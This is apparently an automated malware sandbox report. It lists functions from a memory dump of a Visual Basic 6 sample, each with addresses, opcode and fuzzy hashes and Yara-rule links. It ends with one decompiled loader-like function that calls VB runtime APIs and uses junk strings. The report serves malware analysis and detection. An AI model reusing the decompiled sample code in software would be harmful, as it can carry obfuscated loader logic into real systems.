        • Instruction Fuzzy Hash: 68F15471611349DFEF319E78CD947DA37A2FF1A350F84812ADD8D9B204D3708A868B92
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00274ADA, Relevance: 5.3, Strings: 4, Instructions: 315COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$*G
        • API String ID: 0-214948836
        • Opcode ID: 6c9721978300bbeec95b900a59e302c75e9ec7cfac3a5cffc3e4e019ca07b1a6
        • Instruction ID: 973a381894ae318a0da28b7eecad21981ac4c25d465b0c62a06cfc6bdd4396f8
        • Opcode Fuzzy Hash: 6c9721978300bbeec95b900a59e302c75e9ec7cfac3a5cffc3e4e019ca07b1a6
        • Instruction Fuzzy Hash: ECC11171651349DFEF308E78CD957DA3BA2FF5A350F84812ADC8C9B204D3719A8A8B51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00274AAA, Relevance: 5.3, Strings: 4, Instructions: 308COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: J_($Rn/$Rn/$*G
        • API String ID: 0-214948836
        • Opcode ID: 45cd18c1eb9f7c329155a3e23152a197b2bf56a03e03a22f57fe6de157cfc53f
        • Instruction ID: 51c6111103ff6d3452cf7a4ffdf619e30cbdd95228f024a39e562a7bf28f109b
        • Opcode Fuzzy Hash: 45cd18c1eb9f7c329155a3e23152a197b2bf56a03e03a22f57fe6de157cfc53f
        • Instruction Fuzzy Hash: 2CC10271651349DFEF308E78CD95BDA37A2FF5A310F84812AEC8C8B204D3719A968B51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0027352B, Relevance: 4.1, Strings: 3, Instructions: 307COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: ".M$vD&$*;h
        • API String ID: 0-431630790
        • Opcode ID: e5c77663917ea425dc111942944fe031c32474bb7d84a65048e46a77e1263fad
        • Instruction ID: afc8286af6c8246bb40914f39f16434af055dc76aa4f965852e0bd739dde2027
        • Opcode Fuzzy Hash: e5c77663917ea425dc111942944fe031c32474bb7d84a65048e46a77e1263fad
        • Instruction Fuzzy Hash: 0BC146716103869FDB30DF38CD99BEA77A2AF55360F96815AEC4D9B151D3308A81CF12
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00274021, Relevance: 2.6, Strings: 2, Instructions: 78COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: _K$n?SK
        • API String ID: 0-3414572539
        • Opcode ID: dc1613f30fce24b3abc3d90fed963d170564e26ea5ac6c1e431cc1e30e35cb7e
        • Instruction ID: e6ddc7d3e1f21b3786626d4f22a31dfebe0dccf0c5e21439ce4ac4966d585257
        • Opcode Fuzzy Hash: dc1613f30fce24b3abc3d90fed963d170564e26ea5ac6c1e431cc1e30e35cb7e
        • Instruction Fuzzy Hash: 6C21A872B1430A5FCB681E689E947EF32E3EF92320FA68019DC8AA7100D3748D808606
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00274CF4, Relevance: 1.4, Strings: 1, Instructions: 196COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: *G
        • API String ID: 0-1675791495
        • Opcode ID: c0306323d311eaede4ee2e3a36d98503914e2c87f85fc977c4d8ec210b7ac711
        • Instruction ID: a635a1f20c282ab7b5f752588691b789cc0cf0c742419df222968cc0adbf4371
        • Opcode Fuzzy Hash: c0306323d311eaede4ee2e3a36d98503914e2c87f85fc977c4d8ec210b7ac711
        • Instruction Fuzzy Hash: BB7135716512599FEF35DE38CD457DA3BE2FF1A310F84811AEC8D8B204D7708A868B92
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0027792B, Relevance: .3, Instructions: 346COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: fdfbdd02eb660a0ac61e7da16c583523913027c3b6723d8ce9f31aabafdbc6e9
        • Instruction ID: aee318b4765eefec68e6833c301d888f11d143d52e605c484b7520e0e4ac560e
        • Opcode Fuzzy Hash: fdfbdd02eb660a0ac61e7da16c583523913027c3b6723d8ce9f31aabafdbc6e9
        • Instruction Fuzzy Hash: 61C18672A1870ADFDF30DE28C8957EA77A2AF45350F55812EDC4D9B205E3309E91CB82
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00272655, Relevance: .2, Instructions: 241COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: fadebeef30ae4258c6023e97f09a12056a0981ad7515e5f968ba92292eedbb0c
        • Instruction ID: 93f48d59f4f8f4531b499f3e085e3ccae13c2a356e200e5cf8e2157f333d7844
        • Opcode Fuzzy Hash: fadebeef30ae4258c6023e97f09a12056a0981ad7515e5f968ba92292eedbb0c
        • Instruction Fuzzy Hash: 1C91F27160434A9FCB349E288DE57EF37A6AF59380F95842EDC8DD7205C7319A868B12
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00278F5C, Relevance: .2, Instructions: 219COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 706749d4622b2fe5ffc39f69b11e384af27cca2cd802228e73fdcaff84cffaa9
        • Instruction ID: 156f106db96a3d67dd67cb4f38fde401a1734e9ac6e9dade54078dcba913b2be
        • Opcode Fuzzy Hash: 706749d4622b2fe5ffc39f69b11e384af27cca2cd802228e73fdcaff84cffaa9
        • Instruction Fuzzy Hash: FE81E57561034ACFDB34DE79C8A57EA7B72BF99310F95812ADC0E8B254D3318A86CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00278FD6, Relevance: .2, Instructions: 216COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 84b09b120130231f386c830bd9fa0e9c8eb5a2a4664dbcecbb62a69cb8e8206e
        • Instruction ID: c85f45a177d58490c499d5baa2d82ab8651549aebdb0c31b8d5df7a067fe84ce
        • Opcode Fuzzy Hash: 84b09b120130231f386c830bd9fa0e9c8eb5a2a4664dbcecbb62a69cb8e8206e
        • Instruction Fuzzy Hash: 0F81043461034ACFDB39DE79C8A57DA7B72BF95310F94816ADC0E8B254D3318A85CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00271BF9, Relevance: .2, Instructions: 206COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2be7d61713ed6ee7102cd2004f72d58ec09c8695e3b497dda316c457fcb9219b
        • Instruction ID: 26a12d2af2e0660bceda60aa643ea555b8647dd848ce973f47ec4eef5ec869c7
        • Opcode Fuzzy Hash: 2be7d61713ed6ee7102cd2004f72d58ec09c8695e3b497dda316c457fcb9219b
        • Instruction Fuzzy Hash: EC611471A0439A9BCB349E288C657DA7BA2EF96390FD5412EECCDD7201D3315986CB42
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00278F4F, Relevance: .2, Instructions: 201COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 881b9cd5a0c7c705d2347de4e043bfcc2a9264c4e9a761a7da0d8084e14317ab
        • Instruction ID: 211db4a7de250f669dc40bf4628c3d4be58b39ac2072ee931a226148ab60c67c
        • Opcode Fuzzy Hash: 881b9cd5a0c7c705d2347de4e043bfcc2a9264c4e9a761a7da0d8084e14317ab
        • Instruction Fuzzy Hash: 2471D37461034ACFDB39DE79C9A97DA7772BF99300F94812ACC4E8B258D7318A85CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00279058, Relevance: .2, Instructions: 181COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 34bbbedb39c15a2c8a8b6010226b9ff0e39b05eeaabe72feb147376d846b5090
        • Instruction ID: 25ae2b20b3f9a92997608d0eee37294fa50a04a5b713c616ebf4ec0d406b6be6
        • Opcode Fuzzy Hash: 34bbbedb39c15a2c8a8b6010226b9ff0e39b05eeaabe72feb147376d846b5090
        • Instruction Fuzzy Hash: 3561F07461038ACFDB35DE39C8A57EA7B72BF55310F95812ACC0E9B254D3318A86CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00271BF7, Relevance: .2, Instructions: 179COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: de05062ab0a514a444d98b4cf256c06a3789be3446f4184a3272ba31453a33b3
        • Instruction ID: 3847bfd591c4ff282f1cf8e552a57990e94b71cc5569b08d765c5f6734ee0623
        • Opcode Fuzzy Hash: de05062ab0a514a444d98b4cf256c06a3789be3446f4184a3272ba31453a33b3
        • Instruction Fuzzy Hash: E451E131A0435A9BCB349E2888A97DB77A2EF99350FD6402EECCDD7204D7314D86CB46
        Uniqueness

        Uniqueness Score: -1.00%

        Function 002790D7, Relevance: .2, Instructions: 177COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8a5f85d1cc757a6288315de7bcb5ed95347576ecc93cb03a18d06174a9b33d10
        • Instruction ID: c4faa06271b0a9679db667703589f75a50ce8ce0db2b92a8be6693dbe82d62f4
        • Opcode Fuzzy Hash: 8a5f85d1cc757a6288315de7bcb5ed95347576ecc93cb03a18d06174a9b33d10
        • Instruction Fuzzy Hash: 9561013561038ACFDB39DE79C8A5BDA3B72BF55310F94816ACC0E9B255D3318A85CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00277B34, Relevance: .2, Instructions: 161COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 22547901009b7e4b661ff296db68b598bf2d5cf93eb7e0098cdfe76af221af44
        • Instruction ID: 4ae71bb3e04e857fa3f8ed77af52cb8fa3788a95890b70bb8bedca4cb06b422b
        • Opcode Fuzzy Hash: 22547901009b7e4b661ff296db68b598bf2d5cf93eb7e0098cdfe76af221af44
        • Instruction Fuzzy Hash: F3515876918359DFDB30DE9988956EAB7A2AF457A0F56402ECC485B200D3711F92CBC2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0027796F, Relevance: .2, Instructions: 158COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a4a17dddd4ab4d97e7ade0ba3702c7668bd72e43dfed222669e7b97ac4a4cf4c
        • Instruction ID: ebc6d75bbfa2b246b807d8bb4b34373856667f9a145d2106d3c391c728a89c92
        • Opcode Fuzzy Hash: a4a17dddd4ab4d97e7ade0ba3702c7668bd72e43dfed222669e7b97ac4a4cf4c
        • Instruction Fuzzy Hash: 12517672A187569FDF308E69C8953EBB3A2AF45350F5A811BCC8C97205D3316E91CBC2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00277BDB, Relevance: .1, Instructions: 145COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 031acb43d198d195e210c62f0e5640ad21f3e3f6f076f58aff68052130cd9e8f
        • Instruction ID: ca3d57ee39fafe4e93beabb7e60bab8bac738a8aff8a5c849ad6c4fd24a72b79
        • Opcode Fuzzy Hash: 031acb43d198d195e210c62f0e5640ad21f3e3f6f076f58aff68052130cd9e8f
        • Instruction Fuzzy Hash: 585155729587569FCF30CE69C8947DAB7A2AF49750F1A812FCC8C5B204C3316E91CB82
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00273D14, Relevance: .1, Instructions: 143COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 0bb153bc4347e046e60485cb1a1d636f45197adfac296346711e7591f8e4c7cb
        • Instruction ID: bd639ec52f6182c1d21a9b0147447a45dc757bb93369ac942d1fbe84841c21a8
        • Opcode Fuzzy Hash: 0bb153bc4347e046e60485cb1a1d636f45197adfac296346711e7591f8e4c7cb
        • Instruction Fuzzy Hash: E1513872B103458BCB34CE2AC9E53DA73F2AF49340F54812ECD4E8BA04D735AA51CB16
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00277A0B, Relevance: .1, Instructions: 141COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 6dd5dc23cf328aa7db8e53bf0fbc733d5256670f8bc3e2f30aac520fa8d08d9d
        • Instruction ID: 463264347e2b18594064ffe13748be39e29163fad2af9f8748c2f0d792d06028
        • Opcode Fuzzy Hash: 6dd5dc23cf328aa7db8e53bf0fbc733d5256670f8bc3e2f30aac520fa8d08d9d
        • Instruction Fuzzy Hash: 99513672A187569FDF30CE69C8957DAB7B2AF49350F5A811BCC8897204C3316E91CBC2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00277C0D, Relevance: .1, Instructions: 139COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 837498b268241e0de8332fa2523aa0faf924ff12ac40f17729346a9bbcdf21ac
        • Instruction ID: acc69139434fdc6a5089932bb32e3d6560a9c3b656274e8a66be01e7a1b2b98d
        • Opcode Fuzzy Hash: 837498b268241e0de8332fa2523aa0faf924ff12ac40f17729346a9bbcdf21ac
        • Instruction Fuzzy Hash: 865145769587569FCF30CE6988947DAB7A2AF49350F1A802FCC8C5B205C3316F91CB92
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00277C02, Relevance: .1, Instructions: 138COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 366e521a213802037d496abbeab4438301bfb06dcf8062d0202827548d285319
        • Instruction ID: d7898cc92aa587fd79254390e4fbb8dafe838201cc2135ef436ed484811bcb2b
        • Opcode Fuzzy Hash: 366e521a213802037d496abbeab4438301bfb06dcf8062d0202827548d285319
        • Instruction Fuzzy Hash: A35145729187169FDF308E6988947DAB3A2AF59750F46811FCC8C57204D3712F91CBD2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 002783CF, Relevance: .1, Instructions: 136COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 699a746ce4f031364549ff462b160499e94e104cb998fd49ba235a6272b2fbc0
        • Instruction ID: f5c2b185eab17aa3d8e648fad1c4dd31ae67febbd34c90cc5d2d1b2fd4a1cb44
        • Opcode Fuzzy Hash: 699a746ce4f031364549ff462b160499e94e104cb998fd49ba235a6272b2fbc0
        • Instruction Fuzzy Hash: 3D5147715583C68FCF359E388CA93DA7AA2AF12320F49C2A9CC9DCF246D7318541C762
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0027916F, Relevance: .1, Instructions: 121COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 066c8b5750a1a120f08065b9dc339ca7bcaddcc190836f0d4180e1d8d8b36656
        • Instruction ID: 2c6cc4ebbf5549702329ef2dd586c68217e1b7ab878bf7643a0a3b3f43c876af
        • Opcode Fuzzy Hash: 066c8b5750a1a120f08065b9dc339ca7bcaddcc190836f0d4180e1d8d8b36656
        • Instruction Fuzzy Hash: A741D03461034ACFDB39DE29C8A57EA3772BF95310F94816ADC4E8B294D731CA81CB51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00273714, Relevance: .1, Instructions: 117COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c79602d37295ab75fd4be6158f6abf09328f1b07f901779beff8f1e5aa7e1c3c
        • Instruction ID: 102c9e2c2cbcc549acf60851f9aa3a4544b89cdba1a11b3e2631218433899908
        • Opcode Fuzzy Hash: c79602d37295ab75fd4be6158f6abf09328f1b07f901779beff8f1e5aa7e1c3c
        • Instruction Fuzzy Hash: CF3179B611534A9FEB30EF648DD57EA7BA3AF553A4FA28129DC4C5B201C3714A86CA10
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00272877, Relevance: .1, Instructions: 116COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2d0832d5ccd0b632be7ae35205905394b996e191f6066bcd72db441df32190fa
        • Instruction ID: b507b1437543a2de559b5beeab5c02b3f6253b77a485ef6993f7adb94fe8401f
        • Opcode Fuzzy Hash: 2d0832d5ccd0b632be7ae35205905394b996e191f6066bcd72db441df32190fa
        • Instruction Fuzzy Hash: 0F4124B251838EDFCB309E6498956DE7BA5BF08358FD2042EDC4CE7601D3719A85CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Function 002739D7, Relevance: .1, Instructions: 114COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: effea3e48eae48c3e8ad68349fcc9e035669d1cbe3c224913bf3a703520b2dd9
        • Instruction ID: 6a94a29b3e555604610a9c43c9f459bc320fe0fc09a934e5f2bcc3e104d95e79
        • Opcode Fuzzy Hash: effea3e48eae48c3e8ad68349fcc9e035669d1cbe3c224913bf3a703520b2dd9
        • Instruction Fuzzy Hash: 0B41DDB1A047469FD765DF68C8D8BDAB7A5FF18390F928029DC898B212D774DA818F40
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00279AB9, Relevance: .1, Instructions: 107COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a647b2196b5d2b615d700f461ea7e69eae83e402b998bee2024b229f0a9ee08b
        • Instruction ID: ba0e878028f31239f557a0d3a3ab7c41503db5afdcb0d50417d43d021f2ebcea
        • Opcode Fuzzy Hash: a647b2196b5d2b615d700f461ea7e69eae83e402b998bee2024b229f0a9ee08b
        • Instruction Fuzzy Hash: 57312A7140C1E68FD731DAF44CC94A2FB39BB5A335788838ED8644D49ADA25C0B6D3A3
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0027554D, Relevance: .1, Instructions: 83COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 82877460d6475414a78dc0aefbdff8140516305d48f92ad26848ded1da101a50
        • Instruction ID: 0abeca8bc7787b240f64b550cf1c4eea37252825531e0ee2a42e2a00d8154a41
        • Opcode Fuzzy Hash: 82877460d6475414a78dc0aefbdff8140516305d48f92ad26848ded1da101a50
        • Instruction Fuzzy Hash: 3A215C72A097088FDB28AE35C9A57EBB7A3EFE1300F42842DD8CA47514C33448C6CB06
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00276E4F, Relevance: .0, Instructions: 6COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2355912032.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 4ec5a6a592009478e64112dbfc18298899b25db471413055c37b6c7d834b66ac
        • Instruction ID: 480b1c9ce74bd21ee6082f753385079b8792b693b63b3c1da8e84eab67eb82b1
        • Opcode Fuzzy Hash: 4ec5a6a592009478e64112dbfc18298899b25db471413055c37b6c7d834b66ac
        • Instruction Fuzzy Hash: 70B09274312640CFC241CE19C1A0F8173B0FB08A90B810480E8028BF11C228E8008B00
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00433C94, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 145COMMON
        Download Yara Rule
        C-Code - Quality: 46%
        			E00433C94(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				void* _v56;
				char* _v64;
				signed int _v72;
				intOrPtr _v80;
				signed int _v88;
				intOrPtr _v96;
				signed int _v104;
				intOrPtr _v112;
				signed int _v120;
				intOrPtr _v128;
				signed int _v136;
				intOrPtr* _v156;
				intOrPtr* _t51;
				signed int _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr* _t64;
				signed int _t69;
				void* _t87;
				void* _t89;
				intOrPtr _t90;
				intOrPtr _t99;

				_t90 = _t89 - 0xc;
				 *[fs:0x0] = _t90;
				_v16 = _t90 - 0x94;
				_v12 = 0x401140;
				_v8 = 0;
				_t51 = _a4;
				 *((intOrPtr*)( *_t51 + 4))(_t51, __edi, __esi, __ebx,  *[fs:0x0], 0x401226, _t87);
				_t69 = 2;
				_t53 =  &_v56;
				_push(_t53);
				_push(1);
				_v56 = 0;
				_push(L"FGFG");
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v72 = 0;
				_v88 = 0;
				_v104 = 0;
				_v120 = 0;
				_v136 = 0;
				_v48 = _t69;
				_v56 = _t69;
				L004012F2();
				L0040136A();
				_push(_t53);
				_push(0x431dbc);
				L00401352();
				asm("sbb esi, esi");
				L0040134C();
				L0040133A();
				if( ~( ~( ~_t53)) != 0) {
					_t99 =  *0x435448; // 0x24f6f4
					if(_t99 == 0) {
						_push(0x435448);
						_push(0x431ad4);
						L00401364();
					}
					_v104 = _t69;
					_t54 = 3;
					_v136 = _t54;
					_v128 = 0x16bec2;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v120 = _t54;
					_v112 = 0x12b06b;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v96 = 0x18;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v88 = _t54;
					_t64 =  *0x435448; // 0x24f6f4
					_v80 = 0x5ead28;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v64 = L"PIKARESKE";
					_v72 = 8;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v156 = _t64;
					asm("movsd");
					_t56 =  *((intOrPtr*)( *_t64 + 0x44))(_t64,  &_v40);
					asm("fclex");
					if(_t56 < 0) {
						_push(0x44);
						_push(0x431ac4);
						_push(_v156);
						_push(_t56);
						L0040135E();
					}
					_t53 = _v40;
					_v48 = _t53;
					_v56 = 9;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v28);
					_v40 = 0;
					asm("movsd");
					L00401346();
					L0040133A();
				}
				_v32 = 0x4b3f9744;
				asm("wait");
				_push(0x433e5f);
				L00401358();
				return _t53;
			}

































        0x00433c97
        0x00433ca6
        0x00433cb6
        0x00433cb9
        0x00433cc2
        0x00433cc5
        0x00433ccb
        0x00433cd0
        0x00433cd1
        0x00433cd4
        0x00433cd5
        0x00433cd7
        0x00433cda
        0x00433cdf
        0x00433ce2
        0x00433ce5
        0x00433ce8
        0x00433ceb
        0x00433cee
        0x00433cf1
        0x00433cf4
        0x00433cf7
        0x00433cfd
        0x00433d00
        0x00433d03
        0x00433d0d
        0x00433d12
        0x00433d13
        0x00433d18
        0x00433d21
        0x00433d2a
        0x00433d32
        0x00433d3a
        0x00433d40
        0x00433d46
        0x00433d48
        0x00433d4d
        0x00433d52
        0x00433d52
        0x00433d57
        0x00433d5c
        0x00433d66
        0x00433d6c
        0x00433d79
        0x00433d7a
        0x00433d7b
        0x00433d7c
        0x00433d82
        0x00433d85
        0x00433d8f
        0x00433d90
        0x00433d91
        0x00433d92
        0x00433d98
        0x00433da2
        0x00433da3
        0x00433da4
        0x00433da5
        0x00433da9
        0x00433dac
        0x00433db4
        0x00433dbe
        0x00433dbf
        0x00433dc2
        0x00433dc3
        0x00433dc7
        0x00433dce
        0x00433dda
        0x00433ddb
        0x00433ddc
        0x00433dde
        0x00433de4
        0x00433de5
        0x00433dea
        0x00433dec
        0x00433dee
        0x00433df0
        0x00433df5
        0x00433dfb
        0x00433dfc
        0x00433dfc
        0x00433e01
        0x00433e07
        0x00433e0a
        0x00433e16
        0x00433e17
        0x00433e18
        0x00433e19
        0x00433e1a
        0x00433e1d
        0x00433e20
        0x00433e21
        0x00433e29
        0x00433e29
        0x00433e2e
        0x00433e35
        0x00433e36
        0x00433e59
        0x00433e5e

        APIs
        • #628.MSVBVM60(FGFG,00000001,?), ref: 00433D03
        • __vbaStrMove.MSVBVM60(FGFG,00000001,?), ref: 00433D0D
        • __vbaStrCmp.MSVBVM60(00431DBC,00000000,FGFG,00000001,?), ref: 00433D18
        • __vbaFreeStr.MSVBVM60(00431DBC,00000000,FGFG,00000001,?), ref: 00433D2A
        • __vbaFreeVar.MSVBVM60(00431DBC,00000000,FGFG,00000001,?), ref: 00433D32
        • __vbaNew2.MSVBVM60(00431AD4,00435448,00431DBC,00000000,FGFG,00000001,?), ref: 00433D52
        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00431AC4,00000044), ref: 00433DFC
        • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 00433E21
        • __vbaFreeVar.MSVBVM60(?,00000000), ref: 00433E29
        • __vbaFreeObj.MSVBVM60(00433E5F,00431DBC,00000000,FGFG,00000001,?), ref: 00433E59
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2355935745.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2355931397.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355957257.0000000000435000.00000004.00020000.sdmp Download File
        • Associated: 00000006.00000002.2355962315.0000000000436000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: __vba$Free$#628CheckHresultLateMoveNew2
        • String ID: FGFG$PIKARESKE
        • API String ID: 3824332664-2650081475
        • Opcode ID: 77e8c23a56f3dfa3181d7ab9cdb504912c58e7fc8d620e10da562716eb3cd2b6
        • Instruction ID: d98d35cbb471d84565928b9a09efd14cd1a1e19f47451809068ca4918d836913
        • Opcode Fuzzy Hash: 77e8c23a56f3dfa3181d7ab9cdb504912c58e7fc8d620e10da562716eb3cd2b6
        • Instruction Fuzzy Hash: FD515EB1C016089BDF10EFAAC9826DEBBB5FF09704F60416EE905BB291C7751A098F95
        Uniqueness

        Uniqueness Score: -1.00%

